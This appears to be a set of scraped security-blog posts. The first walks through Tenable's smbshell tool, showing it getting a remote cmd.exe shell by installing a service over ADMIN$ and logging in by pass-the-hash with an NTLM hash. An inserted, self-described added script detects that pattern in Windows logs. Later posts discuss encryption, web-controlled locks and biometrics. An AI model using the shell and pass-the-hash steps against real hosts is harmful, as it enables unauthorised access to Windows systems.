Playing with smbshell
Copy paste from here:
Description
smbshell is a pre-compiled NASL script which can be used as a standalone tool to do the following tasks:
- Navigate thru the remote SMB shares and download files or obtain their version number
- Read/Enumerate the remote SMB registry
- Query/Start/Stop/Pause remote services
- Obtain an interactive shell (cmd.exe) on the remote host
http://cgi.tenablesecurity.com/tenable/smbshell.php
Installation
smbshell is a pre-compiled NASL script - therefore, you need to install Nessus 3 first.
To run smbshell, download it and run it thru the 'nasl' command-line utility:
$ /opt/nessus/bin/nasl -t TargetIP smbshell.nbin
Under Windows, you need to copy it under C:\Program Files\Tenable\Nessus\Plugins\Scripts\. Then you can do:
C:\> Program Files\Tenable\Nessus\nasl.exe -t TargetIP smbshell.nbin
Usage
cg@WPAD:~/evil/passthehashstuff$ /opt/nessus/bin/nasl -t 192.168.0.103 smbshell.nbin
--==[SMB Shell v0.3 (c) 2007 Tenable Network Security]==--
[*] username: smbshell
[*] password:
[*] domain (optional):
[*] Connecting to 192.168.0.103...
[*] Authenticating to 192.168.0.103...
smbshell> help
The following commands are supported :
help - the current screen
ftp - SMB ftp client
reg - registry browser
users - SMB users & groups browser
services - service manager
quit/exit - exit
smbshell>
oh and shell, shell is fun
shell
[*] Opening share ADMIN$...
[*] Connected to ADMIN$ (192.168.0.100:41095 -> 192.168.0.101:445)
[*] Installing remote command service...
[*] Remote command service installed.
[*] Connecting to remote command service...
[*] Connected to remote command service.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>echo woot
echo woot
woot
C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Media State . . . . . . . . . . . : Media disconnected
Ethernet adapter Wireless Network Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.0.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1
C:\WINDOWS\system32>
C:\WINDOWS\system32>exit
[*] Removing remote command service...
[*] Remote command service removed.
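The `shell` transcript above shows the pattern a defender can key on: ADMIN$ is opened from a remote address, a service is installed, and it is removed again minutes later. The script below is an added example (not part of this post or of smbshell) that correlates those steps over constructed log lines; the line format is an assumption, while 5140 (share accessed), 7045 (service installed) and 7036 (service state change) are the standard Windows event IDs.

```python
import re
from datetime import datetime, timedelta

# Constructed sample log lines (not real Windows output). The first three
# mimic the sequence the `shell` command produces on the target; the rest
# are ordinary noise that must not be flagged.
SAMPLE_EVENTS = """\
2007-06-12T10:01:03 host=WS01 event=5140 share=\\\\*\\ADMIN$ src=192.168.0.100 user=smbshell
2007-06-12T10:01:05 host=WS01 event=7045 service=tmpsvc path=%SystemRoot%\\svc.exe
2007-06-12T10:03:40 host=WS01 event=7036 service=tmpsvc state=stopped
2007-06-12T10:15:00 host=WS02 event=7045 service=UpdateAgent path=C:\\agent\\agent.exe
2007-06-12T11:00:00 host=WS03 event=5140 share=\\\\*\\IPC$ src=192.168.0.100 user=bob
"""

KV_RE = re.compile(r"(\w+)=(\S+)")

def parse_event(line):
    """Split 'timestamp key=value ...' into a dict; ts becomes a datetime."""
    ts, rest = line.split(" ", 1)
    fields = dict(KV_RE.findall(rest))
    fields["ts"] = datetime.fromisoformat(ts)
    return fields

def find_admin_share_service_installs(lines, window=timedelta(minutes=5)):
    """Return one finding per (host, service) where a remote ADMIN$ open is
    followed by a service install inside `window`. short_lived is set when
    the service also stops inside the window, as smbshell's helper does."""
    events = sorted((parse_event(l) for l in lines if l.strip()),
                    key=lambda e: e["ts"])
    last_admin = {}   # host -> most recent ADMIN$ access event
    hits = {}         # (host, service) -> finding dict
    for ev in events:
        host = ev["host"]
        if ev["event"] == "5140" and ev.get("share", "").endswith("ADMIN$"):
            last_admin[host] = ev
        elif ev["event"] == "7045":
            opener = last_admin.get(host)
            if opener and ev["ts"] - opener["ts"] <= window:
                hits[(host, ev["service"])] = {
                    "host": host, "src": opener["src"], "user": opener["user"],
                    "service": ev["service"], "installed": ev["ts"],
                    "short_lived": False}
        elif ev["event"] == "7036" and ev.get("state") == "stopped":
            hit = hits.get((host, ev["service"]))
            if hit and ev["ts"] - hit["installed"] <= window:
                hit["short_lived"] = True
    return list(hits.values())

if __name__ == "__main__":
    for hit in find_admin_share_service_installs(SAMPLE_EVENTS.splitlines()):
        print(hit)
```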
Pass the Hash info
http://blog.tenablesecurity.com/2007/06/lmntlm-hash-sup.html
###########################################
--==[SMB Shell v0.3 (c) 2007 Tenable Network Security]==--
[*] username: administrator
[*] password: **Just hit enter here**
[*] hash: NTLM:78164FD1E988FE5B39E0474EEE475E51
[*] domain (optional):
[*] Connecting to 172.11.12.184...
[*] Authenticating to 172.11.12.184...
smbshell>
If you have no idea what nasl is
http://blog.tenablesecurity.com/2007/06/using-the-nasl-.html
Thanks to MC for bringing this up to me.
Lastly, if I see this shit in some "cutting edge hacker techniques" webcast without a mention of this post I'm gonna go off, because this has been out for over two years...I'll leave it at that.
About disc encryption
From zdnet:
Faced with the thought of a USB drive, notebook PC or backup tape going missing, most IT managers look to some form of encryption as the first layer of defence. However, according to one storage security expert, that's largely a pointless exercise.
"I often refer to encryption as crypto fairy dust," Eric Hibbard, chair of the Security Technical Working Group in the Storage Network Industry Association, said in a recent interview. "A lot of IT managers sprinkle this on and think it makes certain problems go away."
The reality, Hibbard suggested, is rather different. "If you're doing encryption in the storage ecosystem, the pay off is very limited. A hard drive or tape drive wandering off is a real problem, but that's not a data confidentiality issue; it's a media confidentiality issue. If you're talking about sensitive information, encryption is just one tool in the toolbox. If you don't have that mated to tight authentication and access control, you're screwed."
Of course, there are plenty of reasons why such a mating isn't happening. Getting to that kind of integrated nirvana is a worthy goal, but rarely happens in IT environments where heterogeneity is a fact of life. There simply isn't time, budget or staffing expertise to bring it all together, so access control tends to be limited to the most pressing projects.
I have to agree with him: Lost (as in not-in-the-building-or-where-it-should-be) data usually means there's a problem with how the data is handled. Encryption can be a good way to prevent such data from being used by third parties due to it being mangled in such a way that it's very hard to read it.
The first thing that should be done, before any USB stick is allowed into the company, is to encrypt those USB sticks. That way, if data is lost, it's not too bad.
After that, if a stick is lost, it is time to figure out how the data was lost in the first place and make sure that it doesn't happen again. How many times has there not been some kind of data loss by one company or agency or another? If the disks are encrypted by default, the loss of a USB stick only means that the IT department will have to get another USB stick and the company will have to see to better security. If the disks are not encrypted by default, well...it could be as bad as the company going down.
Thirdly, once the layers of security (encryption layer, procedural layer and physical security layer) are implemented, you'll have one less hole to worry about.
Unlocking the house from the 'net
From http://www.theinquirer.net/gb/inquirer/news/2008/09/04/unlock-house-via-internet:
THE CEDIA EXPO in Denver has been wowed by some cunning gear designed by Schlage which makes door locks that can be wirelessly set or opened via the Internet, from a mobile phone or a computer.
Each of the battery-operated locks has a keypad that is locked and unlocked with a 4-digit access code. Users who forget to lock a door and want to enter their code remotely can hop onto a Web portal or use software added to their mobile phones.
Schlage says the wireless signals sent to the locks are encrypted. Kit for the lock, which includes the lock and the wireless bridge to communicate with it will set you back $299. There's a $13 monthly fee to use the applications that let the locks be controlled remotely.
The backup device is still a set of metal keys, which is how it has been done for more than 4,000 years.
Woohoo. Not only give burglars access to your house but also hackers for just $299 and $13 per month. I think I'll just stick with my police-approved keys, thank you very much.
I wonder if they could explain to me WHY anyone would want to use this? It gives quite a few additional hazards to the house:
- 4 digits means there are only 9999 different passwords. Any 80386 or faster computer can brute force that many passwords in mere minutes.
- Unlocking over the net...sniffing, phishing, DNS poisoning, SQL injection, cross-site scripting, and many many many more options to exploit to get the access codes...maybe even of all the users, depending on how secure THEIR website is.
- Oh...speaking about THEIR website, do you want a 3rd party you do not know to have the keys to your house?
- Battery-operated locks...what happens if the locks run out of juice? Well...at least they have the same old-fashioned backup metal strips as everyone does. But for some reason I doubt they're police approved.
Edit: I just saw that the locks are for interior use only, according to the pictures. I hope their salespeople say that in their sales pitch.
Password fatigue
I just read an interesting article on so-called password fatigue: http://software.silicon.com/security/0,39024655,39288051,00.htm
Short excerpt:
According to Comet, the rise in sales of PCs with biometrics scanners comes as a result of Britons seeking better security while becoming increasingly fed up with remembering numerous passwords.
To me this seems a bad way to go. Time and time again fingerprint biometrics (and most other biometrics for that matter) have been proven to be faulty and easily duplicated. Why would you trust your computer security to a password that's lying around all over the house, your car, your work, your supermarket and wherever you go? Not too long ago, a Dutch supermarket tried using fingerprints to pay for groceries. They got hacked of course, just like a German supermarket in 2007. Since 1990 people have been warning about using fingerprints as a new type of password and yet no one has any clue about how insecure they really are. A few examples of this are:
http://www.youtube.com/watch?v=LA4Xx5Noxyo (English)
http://www.youtube.com/watch?v=3M8D4wWYgsc (German)
And there are so many more manuals and howtos on how to duplicate and retrieve fingerprints it's just amazing.
Slow Down!!!!!
Well, I just listened to a talk done by Carl Honore about slowing down. He does make quite a bit of sense, as many people I know do tend to do things too fast, do too many things and don't have time for anything other than the things they do.
But, to whoever reads this (if any), listen to it yourself and make up your own mind.